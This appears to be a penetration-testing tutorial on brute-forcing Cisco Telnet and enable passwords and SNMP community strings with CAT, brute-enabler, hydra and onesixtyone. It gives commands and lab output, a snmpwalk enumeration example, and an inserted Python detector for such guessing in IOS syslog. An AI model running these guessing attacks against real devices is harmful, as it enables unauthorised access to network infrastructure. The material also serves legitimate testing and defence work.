CISCO Penetration Testing - Password Guessing/SNMP Attacks
- CAT (Cisco Auditing Tool)
This tool extends beyond simple discovery and can perform dictionary-based attacks against the Telnet server and SNMP agents.
./CAT -h <IP> -a password.wordlist
BT cisco-auditing-tool-v.1.0 # CAT -h 10.1.1.175 -a /tmp/dict.txt
Cisco Auditing Tool - g0ne [null0]
Checking Host: 10.1.1.175
Guessing passwords:
Invalid Password: 1234
Invalid Password: 2read
Invalid Password: 4changes
Password Found: telnet
Invalid Password: CISCO
Invalid Password: IBM
- Brute-enabler
Brute-enabler is an internal enable password guesser. You require valid non-privileged-mode credentials to use this tool; they can be either SSH or Telnet.
./enabler <IP> [-u username] -p password /password.wordlist [port]
BT brute-enable-v.1.0.2 # ./enabler 10.1.1.175 telnet /tmp/dict.txt
[`] enabler.
[`] cisco internal bruteforcer. concept by anyone
[`] coded by norby
[`]
[`] only password needed. sending [telnet]
[`] seems we are logged in :)
[`] telnet... wrong password
[`] CISCO... wrong password
[`] IBM... wrong password
[`] OrigEquipMfr... wrong password
[`] Cisco... wrong password
[`] agent... wrong password
[`] all... wrong password
[`] possible password found: cisco
- hydra
Hydra is a multi-functional password guessing tool. It can connect and pass guessed credentials for many protocols and services, including Cisco Telnet, which may only require a password.
Make sure that you limit the threads to 4 (-t 4), as more will simply overload the Telnet server!
BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco
Hydra v5.3 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2007-02-26 10:54:10
[DATA] 4 tasks, 1 servers, 59 login tries (l:1/p:59), ~14 tries per task
[DATA] attacking service cisco on port 23
Error: Child with pid 21671 was disconnected - retrying (1 of 1 retries)
Error: Child with pid 21673 was disconnected - retrying (1 of 1 retries)
Error: Child with pid 21670 was disconnected - retrying (1 of 1 retries)
Error: Child with pid 21673 was disconnected - exiting
Error: Child with pid 21671 was disconnected - retrying (1 of 1 retries)
Error: Child with pid 21672 terminating, can not connect
Error: Child with pid 21671 was disconnected - retrying (1 of 1 retries)
Error: Child with pid 21707 was disconnected - retrying (1 of 1 retries)
Error: Child with pid 21671 was disconnected - retrying (1 of 1 retries)
[STATUS] attack finished for 10.1.1.175 (waiting for childs to finish)
[23][cisco] host: 10.1.1.175   login:   password: telnet
Hydra (http://www.thc.org) finished at 2007-02-26 10:54:23
SNMP Attacks
- CAT (Cisco Auditing Tool)
This tool extends beyond simple discovery and can perform dictionary-based attacks against the Telnet server and SNMP agents.
./CAT -h <IP> -w SNMP.wordlist
BT cisco-auditing-tool-v.1.0 # CAT -h 10.1.1.175 -w /tmp/snmp.txt
Cisco Auditing Tool - g0ne [null0]
Checking Host: 10.1.1.175
Guessing passwords:
Invalid Password: cisco
Invalid Password: ciscos
Invalid Password: cisco1
Guessing Community Names:
Invalid Community Name: CISCO
Invalid Community Name: IBM
Invalid Community Name: OrigEquipMfr
Community Name Found: Cisco
Invalid Community Name: SNMP
- Onesixtyone
onesixtyone is a reliable SNMP community string guesser.
Once it identifies the correct community string, it will display accurate
fingerprinting information.
onesixtyone -c SNMP.wordlist <IP>
BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175
Scanning 1 hosts, 64 communities
10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
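The defender's side of the Telnet and SNMP guessing runs shown above, as an added example that is not part of the original page: a small detector that parses Cisco IOS syslog lines and flags any source producing repeated authentication failures in a short window. The message formats for SEC_LOGIN-4-LOGIN_FAILED (Telnet/SSH logins) and SNMP-3-AUTHFAIL (bad community strings) are assumed, and the log lines are constructed samples.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Assumed IOS syslog formats: SEC_LOGIN-4-LOGIN_FAILED (Telnet/SSH) and SNMP-3-AUTHFAIL.
LOGIN_FAILED = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ %SEC_LOGIN-4-LOGIN_FAILED: "
    r".*\[Source: (?P<src>[\d.]+)\] \[localport: 23\]")
SNMP_AUTHFAIL = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ %SNMP-3-AUTHFAIL: "
    r"Authentication failure for SNMP req from host (?P<src>[\d.]+)")

def parse_failure(line):
    """Return (timestamp, source IP, service) for a failure line, else None."""
    for pat, svc in ((LOGIN_FAILED, "telnet"), (SNMP_AUTHFAIL, "snmp")):
        if m := pat.match(line):
            return datetime.strptime(m.group("ts"), "%b %d %H:%M:%S"), m.group("src"), svc
    return None

def guessing_alerts(lines, threshold=5, window_s=60):
    """Flag (source, service) pairs with >= threshold failures inside window_s seconds."""
    recent = defaultdict(deque)   # (src, svc) -> failure times still inside the window
    alerts = set()
    for line in lines:
        if (hit := parse_failure(line)) is None:
            continue
        ts, src, svc = hit
        q = recent[(src, svc)]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:   # slide the window forward
            q.popleft()
        if len(q) >= threshold:
            alerts.add((src, svc))
    return sorted(alerts)

# Constructed sample: 10.1.1.50 hammers Telnet then SNMP; 10.1.1.60 mistypes once.
SAMPLE_LOG = [
    f"Feb 26 10:54:{10 + i:02d} 10.1.1.175 %SEC_LOGIN-4-LOGIN_FAILED: Login failed "
    "[user: ] [Source: 10.1.1.50] [localport: 23] [Reason: Login Authentication Failed]"
    for i in range(6)
] + [
    f"Feb 26 10:55:{i:02d} 10.1.1.175 %SNMP-3-AUTHFAIL: Authentication failure "
    "for SNMP req from host 10.1.1.50" for i in range(5)
] + [
    "Feb 26 11:02:33 10.1.1.175 %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: ops] "
    "[Source: 10.1.1.60] [localport: 23] [Reason: Login Authentication Failed]",
]

if __name__ == "__main__":
    print(guessing_alerts(SAMPLE_LOG))   # [('10.1.1.50', 'snmp'), ('10.1.1.50', 'telnet')]
```

On a real device the login failures only appear once 'login on-failure log' is configured, so the Telnet half of this check is silent until that is turned on.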
- snmpwalk
snmpwalk is part of the SNMP toolkit. After a valid community string is identified, you should use snmpwalk to 'walk' the SNMP Management Information Base (MIB) for further information. Ensure that you use the version of the SNMP protocol the device actually runs, or it will not work correctly. It may be a good idea to redirect the output to a text file for easier viewing, as the tool outputs a large amount of text.
snmpwalk -v <Version> -c <Community string> <IP>
BT# snmpwalk -v 1 -c enable 10.1.1.1
SNMPv2-MIB::sysDescr.0 = STRING: Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.9.1.185
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (363099) 1:00:30.99
SNMPv2-MIB::sysContact.0 = STRING:
SNMPv2-MIB::sysName.0 = STRING: router
SNMPv2-MIB::sysLocation.0 = STRING:
SNMPv2-MIB::sysServices.0 = INTEGER: 78
SNMPv2-MIB::sysORLastChange.0 = Timeticks: (0) 0:00:00.00
IF-MIB::ifNumber.0 = INTEGER: 4